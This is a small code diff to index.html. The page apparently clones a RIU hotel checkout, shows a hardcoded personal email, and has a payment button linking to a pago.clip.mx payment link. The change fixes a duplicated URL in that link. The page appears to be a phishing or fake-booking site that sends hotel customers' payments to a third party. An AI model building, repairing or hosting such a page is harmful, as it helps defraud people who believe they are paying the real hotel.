--- a/index.html
+++ b/index.html
@@ -217,7 +217,7 @@ type="text"value="Email: diana5277@hotmail.com"readonly style="color: black !imp
 <riu-tooltip _ngcontent-ng-c526150174=""></riu-tooltip><!-- -->
 <riu-tooltip _ngcontent-ng-c526150174=""></riu-tooltip><!-- --></span><!-- --></riu-credit-cards-list><!-- --><!-- -->
 <div _ngcontent-ng-c2098815706="" class="chekout-section-row hidden-container" id="up-pay-monthly-container" src=""></div>
-<p><a class="link-more-info" href="https://pago.clip.mx/v3/902ce22f-55c6-4cfb-a1da-6ba487651620 https://pago.clip.mx/v3/902ce22f-55c6-4cfb-a1da-6ba487651620">
+<p><a class="link-more-info" href="https://pago.clip.mx/v3/902ce22f-55c6-4cfb-a1da-6ba487651620">
 <img alt="" src="imagenes/bancos/pagar.png"/></a></p></div>
 <div _ngcontent-ng-c2098815706="" class="checkout-section-row">
 <div _ngcontent-ng-c2098815706="" class="riu-payment__section_credit-card">
